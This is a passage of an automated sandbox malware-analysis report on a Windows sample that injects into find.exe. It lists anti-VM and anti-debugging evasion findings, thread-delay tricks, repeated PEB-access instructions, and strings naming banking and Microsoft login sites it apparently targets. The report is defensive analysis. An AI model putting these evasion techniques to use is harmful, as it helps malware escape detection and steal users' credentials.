                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 6704, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 1460000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 4E30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 9220000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 7D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: A220000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: B220000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F8096E rdtsc 3_2_00F8096E
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exeWindow / User API: threadDelayed 2780Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exeWindow / User API: threadDelayed 7192Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\find.exeAPI coverage: 2.6 %
                      Source: C:\Users\user\Desktop\file.exe TID: 5420Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\find.exe TID: 2056Thread sleep count: 2780 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exe TID: 2056Thread sleep time: -5560000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\find.exe TID: 2056Thread sleep count: 7192 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exe TID: 2056Thread sleep time: -14384000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe TID: 3276Thread sleep time: -75000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe TID: 3276Thread sleep count: 36 > 30Jump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe TID: 3276Thread sleep time: -54000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe TID: 3276Thread sleep count: 37 > 30Jump to behavior
                      Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe TID: 3276Thread sleep time: -37000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\find.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006DC7D0 FindFirstFileW,FindNextFileW,FindClose,5_2_006DC7D0
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: e151968.5.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                      Source: e151968.5.drBinary or memory string: discord.comVMware20,11696494690f
                      Source: e151968.5.drBinary or memory string: AMC password management pageVMware20,11696494690
                      Source: e151968.5.drBinary or memory string: outlook.office.comVMware20,11696494690s
                      Source: e151968.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                      Source: e151968.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                      Source: e151968.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                      Source: e151968.5.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                      Source: e151968.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                      Source: e151968.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                      Source: e151968.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                      Source: e151968.5.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                      Source: e151968.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                      Source: e151968.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                      Source: e151968.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                      Source: e151968.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                      Source: e151968.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                      Source: e151968.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                      Source: e151968.5.drBinary or memory string: tasks.office.comVMware20,11696494690o
                      Source: e151968.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
                      Source: YpbicUfTwt.exe, 00000007.00000002.3863130535.000000000161F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                      Source: e151968.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                      Source: e151968.5.drBinary or memory string: dev.azure.comVMware20,11696494690j
                      Source: e151968.5.drBinary or memory string: global block list test formVMware20,11696494690
                      Source: e151968.5.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                      Source: e151968.5.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                      Source: e151968.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                      Source: e151968.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                      Source: e151968.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                      Source: e151968.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                      Source: e151968.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                      Source: e151968.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                      Source: firefox.exe, 00000009.00000002.1878266068.00000201EBBAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
                      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F8096E rdtsc 3_2_00F8096E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00417993 LdrLoadDll,3_2_00417993
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3C0F0 mov eax, dword ptr fs:[00000030h]3_2_00F3C0F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F820F0 mov ecx, dword ptr fs:[00000030h]3_2_00F820F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3A0E3 mov ecx, dword ptr fs:[00000030h]3_2_00F3A0E3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01000115 mov eax, dword ptr fs:[00000030h]3_2_01000115
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC60E0 mov eax, dword ptr fs:[00000030h]3_2_00FC60E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F480E9 mov eax, dword ptr fs:[00000030h]3_2_00F480E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC20DE mov eax, dword ptr fs:[00000030h]3_2_00FC20DE
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F380A0 mov eax, dword ptr fs:[00000030h]3_2_00F380A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD80A8 mov eax, dword ptr fs:[00000030h]3_2_00FD80A8
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014164 mov eax, dword ptr fs:[00000030h]3_2_01014164
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014164 mov eax, dword ptr fs:[00000030h]3_2_01014164
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4208A mov eax, dword ptr fs:[00000030h]3_2_00F4208A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6C073 mov eax, dword ptr fs:[00000030h]3_2_00F6C073
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F42050 mov eax, dword ptr fs:[00000030h]3_2_00F42050
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6050 mov eax, dword ptr fs:[00000030h]3_2_00FC6050
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010061C3 mov eax, dword ptr fs:[00000030h]3_2_010061C3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010061C3 mov eax, dword ptr fs:[00000030h]3_2_010061C3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD6030 mov eax, dword ptr fs:[00000030h]3_2_00FD6030
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3A020 mov eax, dword ptr fs:[00000030h]3_2_00F3A020
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3C020 mov eax, dword ptr fs:[00000030h]3_2_00F3C020
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5E016 mov eax, dword ptr fs:[00000030h]3_2_00F5E016
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5E016 mov eax, dword ptr fs:[00000030h]3_2_00F5E016
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5E016 mov eax, dword ptr fs:[00000030h]3_2_00F5E016
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5E016 mov eax, dword ptr fs:[00000030h]3_2_00F5E016
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010161E5 mov eax, dword ptr fs:[00000030h]3_2_010161E5
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC4000 mov ecx, dword ptr fs:[00000030h]3_2_00FC4000
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE2000 mov eax, dword ptr fs:[00000030h]3_2_00FE2000
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE2000 mov eax, dword ptr fs:[00000030h]3_2_00FE2000
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE2000 mov eax, dword ptr fs:[00000030h]3_2_00FE2000
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE2000 mov eax, dword ptr fs:[00000030h]3_2_00FE2000
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE2000 mov eax, dword ptr fs:[00000030h]3_2_00FE2000
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE2000 mov eax, dword ptr fs:[00000030h]3_2_00FE2000
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE2000 mov eax, dword ptr fs:[00000030h]3_2_00FE2000
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE2000 mov eax, dword ptr fs:[00000030h]3_2_00FE2000
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F701F8 mov eax, dword ptr fs:[00000030h]3_2_00F701F8
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE1D0 mov eax, dword ptr fs:[00000030h]3_2_00FBE1D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE1D0 mov eax, dword ptr fs:[00000030h]3_2_00FBE1D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE1D0 mov ecx, dword ptr fs:[00000030h]3_2_00FBE1D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE1D0 mov eax, dword ptr fs:[00000030h]3_2_00FBE1D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE1D0 mov eax, dword ptr fs:[00000030h]3_2_00FBE1D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC019F mov eax, dword ptr fs:[00000030h]3_2_00FC019F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC019F mov eax, dword ptr fs:[00000030h]3_2_00FC019F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC019F mov eax, dword ptr fs:[00000030h]3_2_00FC019F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC019F mov eax, dword ptr fs:[00000030h]3_2_00FC019F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3A197 mov eax, dword ptr fs:[00000030h]3_2_00F3A197
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3A197 mov eax, dword ptr fs:[00000030h]3_2_00F3A197
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3A197 mov eax, dword ptr fs:[00000030h]3_2_00F3A197
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FFC188 mov eax, dword ptr fs:[00000030h]3_2_00FFC188
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FFC188 mov eax, dword ptr fs:[00000030h]3_2_00FFC188
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F80185 mov eax, dword ptr fs:[00000030h]3_2_00F80185
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE4180 mov eax, dword ptr fs:[00000030h]3_2_00FE4180
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE4180 mov eax, dword ptr fs:[00000030h]3_2_00FE4180
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F46154 mov eax, dword ptr fs:[00000030h]3_2_00F46154
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F46154 mov eax, dword ptr fs:[00000030h]3_2_00F46154
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3C156 mov eax, dword ptr fs:[00000030h]3_2_00F3C156
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD8158 mov eax, dword ptr fs:[00000030h]3_2_00FD8158
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010060B8 mov eax, dword ptr fs:[00000030h]3_2_010060B8
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010060B8 mov ecx, dword ptr fs:[00000030h]3_2_010060B8
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD4144 mov eax, dword ptr fs:[00000030h]3_2_00FD4144
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD4144 mov eax, dword ptr fs:[00000030h]3_2_00FD4144
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD4144 mov ecx, dword ptr fs:[00000030h]3_2_00FD4144
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD4144 mov eax, dword ptr fs:[00000030h]3_2_00FD4144
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD4144 mov eax, dword ptr fs:[00000030h]3_2_00FD4144
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F70124 mov eax, dword ptr fs:[00000030h]3_2_00F70124
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEA118 mov ecx, dword ptr fs:[00000030h]3_2_00FEA118
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEA118 mov eax, dword ptr fs:[00000030h]3_2_00FEA118
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEA118 mov eax, dword ptr fs:[00000030h]3_2_00FEA118
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEA118 mov eax, dword ptr fs:[00000030h]3_2_00FEA118
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE10E mov eax, dword ptr fs:[00000030h]3_2_00FEE10E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE10E mov ecx, dword ptr fs:[00000030h]3_2_00FEE10E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE10E mov eax, dword ptr fs:[00000030h]3_2_00FEE10E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE10E mov eax, dword ptr fs:[00000030h]3_2_00FEE10E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE10E mov ecx, dword ptr fs:[00000030h]3_2_00FEE10E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE10E mov eax, dword ptr fs:[00000030h]3_2_00FEE10E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE10E mov eax, dword ptr fs:[00000030h]3_2_00FEE10E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE10E mov ecx, dword ptr fs:[00000030h]3_2_00FEE10E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE10E mov eax, dword ptr fs:[00000030h]3_2_00FEE10E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE10E mov ecx, dword ptr fs:[00000030h]3_2_00FEE10E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F502E1 mov eax, dword ptr fs:[00000030h]3_2_00F502E1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F502E1 mov eax, dword ptr fs:[00000030h]3_2_00F502E1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F502E1 mov eax, dword ptr fs:[00000030h]3_2_00F502E1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01018324 mov eax, dword ptr fs:[00000030h]3_2_01018324
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01018324 mov ecx, dword ptr fs:[00000030h]3_2_01018324
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01018324 mov eax, dword ptr fs:[00000030h]3_2_01018324
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01018324 mov eax, dword ptr fs:[00000030h]3_2_01018324
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F4A2C3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F4A2C3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F4A2C3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F4A2C3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]3_2_00F4A2C3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0101634F mov eax, dword ptr fs:[00000030h]3_2_0101634F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100A352 mov eax, dword ptr fs:[00000030h]3_2_0100A352
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F502A0 mov eax, dword ptr fs:[00000030h]3_2_00F502A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F502A0 mov eax, dword ptr fs:[00000030h]3_2_00F502A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD62A0 mov eax, dword ptr fs:[00000030h]3_2_00FD62A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD62A0 mov ecx, dword ptr fs:[00000030h]3_2_00FD62A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD62A0 mov eax, dword ptr fs:[00000030h]3_2_00FD62A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD62A0 mov eax, dword ptr fs:[00000030h]3_2_00FD62A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD62A0 mov eax, dword ptr fs:[00000030h]3_2_00FD62A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD62A0 mov eax, dword ptr fs:[00000030h]3_2_00FD62A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E284 mov eax, dword ptr fs:[00000030h]3_2_00F7E284
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E284 mov eax, dword ptr fs:[00000030h]3_2_00F7E284
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC0283 mov eax, dword ptr fs:[00000030h]3_2_00FC0283
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC0283 mov eax, dword ptr fs:[00000030h]3_2_00FC0283
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC0283 mov eax, dword ptr fs:[00000030h]3_2_00FC0283
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF0274 mov eax, dword ptr fs:[00000030h]3_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF0274 mov eax, dword ptr fs:[00000030h]3_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF0274 mov eax, dword ptr fs:[00000030h]3_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF0274 mov eax, dword ptr fs:[00000030h]3_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF0274 mov eax, dword ptr fs:[00000030h]3_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF0274 mov eax, dword ptr fs:[00000030h]3_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF0274 mov eax, dword ptr fs:[00000030h]3_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF0274 mov eax, dword ptr fs:[00000030h]3_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF0274 mov eax, dword ptr fs:[00000030h]3_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF0274 mov eax, dword ptr fs:[00000030h]3_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF0274 mov eax, dword ptr fs:[00000030h]3_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF0274 mov eax, dword ptr fs:[00000030h]3_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F44260 mov eax, dword ptr fs:[00000030h]3_2_00F44260
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F44260 mov eax, dword ptr fs:[00000030h]3_2_00F44260
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F44260 mov eax, dword ptr fs:[00000030h]3_2_00F44260
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3826B mov eax, dword ptr fs:[00000030h]3_2_00F3826B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3A250 mov eax, dword ptr fs:[00000030h]3_2_00F3A250
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F46259 mov eax, dword ptr fs:[00000030h]3_2_00F46259
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FFA250 mov eax, dword ptr fs:[00000030h]3_2_00FFA250
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FFA250 mov eax, dword ptr fs:[00000030h]3_2_00FFA250
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC8243 mov eax, dword ptr fs:[00000030h]3_2_00FC8243
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC8243 mov ecx, dword ptr fs:[00000030h]3_2_00FC8243
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3823B mov eax, dword ptr fs:[00000030h]3_2_00F3823B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F5E3F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F5E3F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F5E3F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F763FF mov eax, dword ptr fs:[00000030h]3_2_00F763FF
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F503E9 mov eax, dword ptr fs:[00000030h]3_2_00F503E9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE3DB mov eax, dword ptr fs:[00000030h]3_2_00FEE3DB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE3DB mov eax, dword ptr fs:[00000030h]3_2_00FEE3DB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE3DB mov ecx, dword ptr fs:[00000030h]3_2_00FEE3DB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEE3DB mov eax, dword ptr fs:[00000030h]3_2_00FEE3DB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE43D4 mov eax, dword ptr fs:[00000030h]3_2_00FE43D4
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE43D4 mov eax, dword ptr fs:[00000030h]3_2_00FE43D4
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FFC3CD mov eax, dword ptr fs:[00000030h]3_2_00FFC3CD
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F4A3C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F4A3C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F4A3C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F4A3C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F4A3C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F4A3C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F483C0 mov eax, dword ptr fs:[00000030h]3_2_00F483C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F483C0 mov eax, dword ptr fs:[00000030h]3_2_00F483C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F483C0 mov eax, dword ptr fs:[00000030h]3_2_00F483C0
